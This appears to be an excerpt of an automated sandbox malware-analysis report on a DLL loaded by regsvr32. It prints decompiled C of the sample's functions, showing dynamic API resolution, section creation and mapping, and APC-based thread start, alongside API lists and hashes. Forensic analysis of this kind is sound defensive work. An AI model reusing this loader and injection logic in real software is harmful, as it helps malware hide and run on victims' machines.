                                                                                                                                                                  0x67cd1f7c
                                                                                                                                                                  0x67cd1f85
                                                                                                                                                                  0x67cd1f8a
                                                                                                                                                                  0x67cd1f90
                                                                                                                                                                  0x67cd1f99
                                                                                                                                                                  0x67cd1f9f
                                                                                                                                                                  0x67cd1fa1
                                                                                                                                                                  0x67cd1fa4
                                                                                                                                                                  0x67cd1fa9
                                                                                                                                                                  0x67cd1fb0
                                                                                                                                                                  0x67cd1fb0
                                                                                                                                                                  0x67cd1fb4
                                                                                                                                                                  0x67cd1fbc
                                                                                                                                                                  0x67cd1fbf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1fc5
                                                                                                                                                                  0x67cd1fcf
                                                                                                                                                                  0x67cd1fd1
                                                                                                                                                                  0x67cd1fd4
                                                                                                                                                                  0x67cd1fd7
                                                                                                                                                                  0x67cd1fdb
                                                                                                                                                                  0x67cd1fe3
                                                                                                                                                                  0x67cd1fe5
                                                                                                                                                                  0x67cd1fe8
                                                                                                                                                                  0x67cd2050
                                                                                                                                                                  0x67cd2050
                                                                                                                                                                  0x67cd2054
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1fed
                                                                                                                                                                  0x67cd1ff3
                                                                                                                                                                  0x67cd1ff5
                                                                                                                                                                  0x67cd2008
                                                                                                                                                                  0x67cd200b
                                                                                                                                                                  0x67cd200b
                                                                                                                                                                  0x67cd200b
                                                                                                                                                                  0x67cd200f
                                                                                                                                                                  0x67cd1ff7
                                                                                                                                                                  0x67cd1ff7
                                                                                                                                                                  0x67cd1fff
                                                                                                                                                                  0x67cd2001
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2001
                                                                                                                                                                  0x67cd1fef
                                                                                                                                                                  0x67cd1fef
                                                                                                                                                                  0x67cd2003
                                                                                                                                                                  0x67cd2003
                                                                                                                                                                  0x67cd2003
                                                                                                                                                                  0x67cd2012
                                                                                                                                                                  0x67cd2015
                                                                                                                                                                  0x67cd2017
                                                                                                                                                                  0x67cd201e
                                                                                                                                                                  0x67cd2019
                                                                                                                                                                  0x67cd2019
                                                                                                                                                                  0x67cd2019
                                                                                                                                                                  0x67cd2026
                                                                                                                                                                  0x67cd202c
                                                                                                                                                                  0x67cd202e
                                                                                                                                                                  0x67cd205e
                                                                                                                                                                  0x67cd2030
                                                                                                                                                                  0x67cd2030
                                                                                                                                                                  0x67cd2033
                                                                                                                                                                  0x67cd2035
                                                                                                                                                                  0x67cd203d
                                                                                                                                                                  0x67cd203d
                                                                                                                                                                  0x67cd2042
                                                                                                                                                                  0x67cd2044
                                                                                                                                                                  0x67cd204b
                                                                                                                                                                  0x67cd204d
                                                                                                                                                                  0x67cd204d
                                                                                                                                                                  0x67cd204d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd204d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd202e
                                                                                                                                                                  0x67cd1fdd
                                                                                                                                                                  0x67cd1fdf
                                                                                                                                                                  0x67cd1fe1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1fe1
                                                                                                                                                                  0x67cd2061
                                                                                                                                                                  0x67cd2061
                                                                                                                                                                  0x67cd2068
                                                                                                                                                                  0x67cd206d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2073
                                                                                                                                                                  0x67cd207e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd207e
                                                                                                                                                                  0x67cd2075
                                                                                                                                                                  0x67cd2075
                                                                                                                                                                  0x67cd207b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd207b
                                                                                                                                                                  0x67cd1fa9
                                                                                                                                                                  0x67cd207f
                                                                                                                                                                  0x67cd2084

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 67CD1FB4
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 67CD2026
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 3bd80669eebaa1b0b4a1bd10f426e2d406d08d9fa16b9f44f070db5731c6ef63
                                                                                                                                                                  • Instruction ID: 2b0b2b23e26e8a3a05248e5bce104d8dc3cdef9999820b3e82f48212cf6fd264
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd80669eebaa1b0b4a1bd10f426e2d406d08d9fa16b9f44f070db5731c6ef63
                                                                                                                                                                  • Instruction Fuzzy Hash: 47311571A0020ADFDB14CFA9C894AAEBBF8FF59341F14406ADA55E7244F774EA41CB50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1EC7, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E67CD1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                  0x67cd1ed9
                                                                                                                                                                  0x67cd1edf
                                                                                                                                                                  0x67cd1eed
                                                                                                                                                                  0x67cd1ef4
                                                                                                                                                                  0x67cd1ef9
                                                                                                                                                                  0x67cd1eff
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1f00
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,67CD1C0E,00000002,00000000,?,?,00000000,?,?,67CD1C0E,00000000), ref: 67CD1EF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SectionView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1323581903-0
                                                                                                                                                                  • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                  • Instruction ID: 74090a63db74b8b452dba94e31ee7e82ce2f0212ef3ec7df92ae12ec9a44df13
                                                                                                                                                                  • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                  • Instruction Fuzzy Hash: 4DF012B690420CBFEB119FA9CC85C9FBBBDEB48354B104939B652E1090D6309E088A60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1C7D, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E67CD1C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E67CD1F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E67CD18AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E67CD1ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E67CD13D1(E67CD14E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E67CD134F(_t45,  &_v48) != 0) {
					 *0x67cd41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x67cd41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E67CD1B58(_t50 + _t15);
				 *0x67cd41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E67CD142F(_t44);
					goto L11;
				}
			}






















                                                                                                                                                                  0x67cd1c89
                                                                                                                                                                  0x67cd1c92
                                                                                                                                                                  0x67cd1c96
                                                                                                                                                                  0x67cd1d9e
                                                                                                                                                                  0x67cd1da4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1c9c
                                                                                                                                                                  0x67cd1c9c
                                                                                                                                                                  0x67cd1ca1
                                                                                                                                                                  0x67cd1ca7
                                                                                                                                                                  0x67cd1cb6
                                                                                                                                                                  0x67cd1cb7
                                                                                                                                                                  0x67cd1cba
                                                                                                                                                                  0x67cd1cbd
                                                                                                                                                                  0x67cd1cc6
                                                                                                                                                                  0x67cd1cca
                                                                                                                                                                  0x67cd1cd0
                                                                                                                                                                  0x67cd1cd4
                                                                                                                                                                  0x67cd1cdb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1ce1
                                                                                                                                                                  0x67cd1ce8
                                                                                                                                                                  0x67cd1cec
                                                                                                                                                                  0x67cd1d8f
                                                                                                                                                                  0x67cd1d8f
                                                                                                                                                                  0x67cd1d96
                                                                                                                                                                  0x67cd1d98
                                                                                                                                                                  0x67cd1d98
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d96
                                                                                                                                                                  0x67cd1cf5
                                                                                                                                                                  0x67cd1d48
                                                                                                                                                                  0x67cd1d48
                                                                                                                                                                  0x67cd1d59
                                                                                                                                                                  0x67cd1d5d
                                                                                                                                                                  0x67cd1d8b
                                                                                                                                                                  0x67cd1d5f
                                                                                                                                                                  0x67cd1d62
                                                                                                                                                                  0x67cd1d6a
                                                                                                                                                                  0x67cd1d6e
                                                                                                                                                                  0x67cd1d76
                                                                                                                                                                  0x67cd1d76
                                                                                                                                                                  0x67cd1d7d
                                                                                                                                                                  0x67cd1d7d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d5d
                                                                                                                                                                  0x67cd1d03
                                                                                                                                                                  0x67cd1d42
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d42
                                                                                                                                                                  0x67cd1d05
                                                                                                                                                                  0x67cd1d09
                                                                                                                                                                  0x67cd1d12
                                                                                                                                                                  0x67cd1d14
                                                                                                                                                                  0x67cd1d18
                                                                                                                                                                  0x67cd1d3a
                                                                                                                                                                  0x67cd1d3a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d3a
                                                                                                                                                                  0x67cd1d1a
                                                                                                                                                                  0x67cd1d1f
                                                                                                                                                                  0x67cd1d26
                                                                                                                                                                  0x67cd1d2b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d2d
                                                                                                                                                                  0x67cd1d30
                                                                                                                                                                  0x67cd1d33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1d33

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,67CD1C8E,74B063F0,00000000), ref: 67CD1F1F
                                                                                                                                                                    • Part of subcall function 67CD1F10: GetVersion.KERNEL32 ref: 67CD1F2E
                                                                                                                                                                    • Part of subcall function 67CD1F10: GetCurrentProcessId.KERNEL32 ref: 67CD1F3D
                                                                                                                                                                    • Part of subcall function 67CD1F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 67CD1F56
                                                                                                                                                                  • GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 67CD1CA1
                                                                                                                                                                  • SwitchToThread.KERNEL32 ref: 67CD1CA7
                                                                                                                                                                    • Part of subcall function 67CD18AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 67CD1903
                                                                                                                                                                    • Part of subcall function 67CD18AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 67CD19C9
                                                                                                                                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 67CD1CCA
                                                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 67CD1D12
                                                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 67CD1D30
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,67CD14E8,?,00000000), ref: 67CD1D62
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 67CD1D76
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 67CD1D7D
                                                                                                                                                                  • GetLastError.KERNEL32(67CD14E8,?,00000000), ref: 67CD1D85
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 67CD1D98
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1962885430-0
                                                                                                                                                                  • Opcode ID: 67376253c0c9c92365f832db18a6a49425bf2a8baeb2ca2a70dc03c9130926db
                                                                                                                                                                  • Instruction ID: 1b143a0a601ef635c323f5fdc49bc50b841d0d115258fc1778b813ce63fe93e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 67376253c0c9c92365f832db18a6a49425bf2a8baeb2ca2a70dc03c9130926db
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E316F71544741AB8711DF7E888996F76FCAF8E354F120A1AFB65C2140FB34D500C7A6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1060, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 107 67cd1060-67cd1072 call 67cd1b58 110 67cd1078-67cd10ad GetModuleHandleA GetProcAddress 107->110 111 67cd1133 107->111 113 67cd10af-67cd10c3 GetProcAddress 110->113 114 67cd112b-67cd1131 call 67cd142f 110->114 112 67cd113a-67cd1141 111->112 113->114 115 67cd10c5-67cd10d9 GetProcAddress 113->115 114->112 115->114 118 67cd10db-67cd10ef GetProcAddress 115->118 118->114 119 67cd10f1-67cd1105 GetProcAddress 118->119 119->114 120 67cd1107-67cd1118 call 67cd1b9c 119->120 122 67cd111d-67cd1122 120->122 122->114 123 67cd1124-67cd1129 122->123 123->112
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E67CD1B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x67cd41d0 + 0x67cd5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E67CD142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x67cd41d0 + 0x67cd512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E67CD1B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                  0x67cd106e
                                                                                                                                                                  0x67cd1072
                                                                                                                                                                  0x67cd1133
                                                                                                                                                                  0x67cd1078
                                                                                                                                                                  0x67cd1090
                                                                                                                                                                  0x67cd109f
                                                                                                                                                                  0x67cd10a6
                                                                                                                                                                  0x67cd10aa
                                                                                                                                                                  0x67cd10ad
                                                                                                                                                                  0x67cd112b
                                                                                                                                                                  0x67cd112c
                                                                                                                                                                  0x67cd10af
                                                                                                                                                                  0x67cd10bc
                                                                                                                                                                  0x67cd10c0
                                                                                                                                                                  0x67cd10c3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd10c5
                                                                                                                                                                  0x67cd10d2
                                                                                                                                                                  0x67cd10d6
                                                                                                                                                                  0x67cd10d9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd10db
                                                                                                                                                                  0x67cd10e8
                                                                                                                                                                  0x67cd10ec
                                                                                                                                                                  0x67cd10ef
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd10f1
                                                                                                                                                                  0x67cd10fe
                                                                                                                                                                  0x67cd1102
                                                                                                                                                                  0x67cd1105
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1107
                                                                                                                                                                  0x67cd110d
                                                                                                                                                                  0x67cd1113
                                                                                                                                                                  0x67cd1118
                                                                                                                                                                  0x67cd111f
                                                                                                                                                                  0x67cd1122
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1124
                                                                                                                                                                  0x67cd1127
                                                                                                                                                                  0x67cd1127
                                                                                                                                                                  0x67cd1122
                                                                                                                                                                  0x67cd1105
                                                                                                                                                                  0x67cd10ef
                                                                                                                                                                  0x67cd10d9
                                                                                                                                                                  0x67cd10c3
                                                                                                                                                                  0x67cd10ad
                                                                                                                                                                  0x67cd1141

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1B58: HeapAlloc.KERNEL32(00000000,?,67CD1702,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B64
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,67CD1480,?,?,?,?,00000002,00000000,?,?), ref: 67CD1084
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10A6
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10BC
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10D2
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10E8
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 67CD10FE
                                                                                                                                                                    • Part of subcall function 67CD1B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 67CD1BF9
                                                                                                                                                                    • Part of subcall function 67CD1B9C: memset.NTDLL ref: 67CD1C1B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                                                  • Opcode ID: 87891b127afffb9a195ae895041c93d9dcc18623e942644cd28d390c86b2889d
                                                                                                                                                                  • Instruction ID: 918d63128f4a9c984aa4f17666073b26ab1cf8291fed12a9a8575b442f4ff28a
                                                                                                                                                                  • Opcode Fuzzy Hash: 87891b127afffb9a195ae895041c93d9dcc18623e942644cd28d390c86b2889d
                                                                                                                                                                  • Instruction Fuzzy Hash: 63212BB160060AEFDB10EF6DE8C5E5A7BFCEB19344B024425EA05C7201F734EA45CBA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1DAE, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 124 67cd1dae-67cd1dc2 125 67cd1dc4-67cd1dc5 124->125 126 67cd1e33-67cd1e40 InterlockedDecrement 124->126 127 67cd1e80-67cd1e87 125->127 129 67cd1dcb-67cd1dd8 InterlockedIncrement 125->129 126->127 128 67cd1e42-67cd1e48 126->128 130 67cd1e4a 128->130 131 67cd1e74-67cd1e7a HeapDestroy 128->131 129->127 132 67cd1dde-67cd1df2 HeapCreate 129->132 133 67cd1e4f-67cd1e5f SleepEx 130->133 131->127 134 67cd1e2e-67cd1e31 132->134 135 67cd1df4-67cd1e25 call 67cd121c call 67cd13d1 132->135 136 67cd1e68-67cd1e6e CloseHandle 133->136 137 67cd1e61-67cd1e66 133->137 134->127 135->127 142 67cd1e27-67cd1e2a 135->142 136->131 137->133 137->136 142->134
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x67cd4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x67cd418c;
						if( *0x67cd418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x67cd4198;
								if( *0x67cd4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x67cd418c);
						}
						HeapDestroy( *0x67cd4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x67cd4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x67cd4190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x67cd41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E67CD13D1(E67CD20CE, E67CD121C(_a12, 1, 0x67cd4198, _t41));
							 *0x67cd418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                  0x67cd1db1
                                                                                                                                                                  0x67cd1dbd
                                                                                                                                                                  0x67cd1dbf
                                                                                                                                                                  0x67cd1dc2
                                                                                                                                                                  0x67cd1e38
                                                                                                                                                                  0x67cd1e3e
                                                                                                                                                                  0x67cd1e40
                                                                                                                                                                  0x67cd1e42
                                                                                                                                                                  0x67cd1e48
                                                                                                                                                                  0x67cd1e4a
                                                                                                                                                                  0x67cd1e4f
                                                                                                                                                                  0x67cd1e52
                                                                                                                                                                  0x67cd1e5d
                                                                                                                                                                  0x67cd1e5f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1e61
                                                                                                                                                                  0x67cd1e64
                                                                                                                                                                  0x67cd1e66
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1e66
                                                                                                                                                                  0x67cd1e6e
                                                                                                                                                                  0x67cd1e6e
                                                                                                                                                                  0x67cd1e7a
                                                                                                                                                                  0x67cd1e7a
                                                                                                                                                                  0x67cd1dc4
                                                                                                                                                                  0x67cd1dc5
                                                                                                                                                                  0x67cd1de5
                                                                                                                                                                  0x67cd1deb
                                                                                                                                                                  0x67cd1ded
                                                                                                                                                                  0x67cd1df2
                                                                                                                                                                  0x67cd1e2e
                                                                                                                                                                  0x67cd1e2e
                                                                                                                                                                  0x67cd1df4
                                                                                                                                                                  0x67cd1dfc
                                                                                                                                                                  0x67cd1e03
                                                                                                                                                                  0x67cd1e0d
                                                                                                                                                                  0x67cd1e19
                                                                                                                                                                  0x67cd1e20
                                                                                                                                                                  0x67cd1e25
                                                                                                                                                                  0x67cd1e2a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1e2a
                                                                                                                                                                  0x67cd1e25
                                                                                                                                                                  0x67cd1df2
                                                                                                                                                                  0x67cd1dc5
                                                                                                                                                                  0x67cd1e87

                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(67CD4188), ref: 67CD1DD0
                                                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 67CD1DE5
                                                                                                                                                                    • Part of subcall function 67CD13D1: CreateThread.KERNELBASE ref: 67CD13E8
                                                                                                                                                                    • Part of subcall function 67CD13D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 67CD13FD
                                                                                                                                                                    • Part of subcall function 67CD13D1: GetLastError.KERNEL32(00000000), ref: 67CD1408
                                                                                                                                                                    • Part of subcall function 67CD13D1: TerminateThread.KERNEL32(00000000,00000000), ref: 67CD1412
                                                                                                                                                                    • Part of subcall function 67CD13D1: CloseHandle.KERNEL32(00000000), ref: 67CD1419
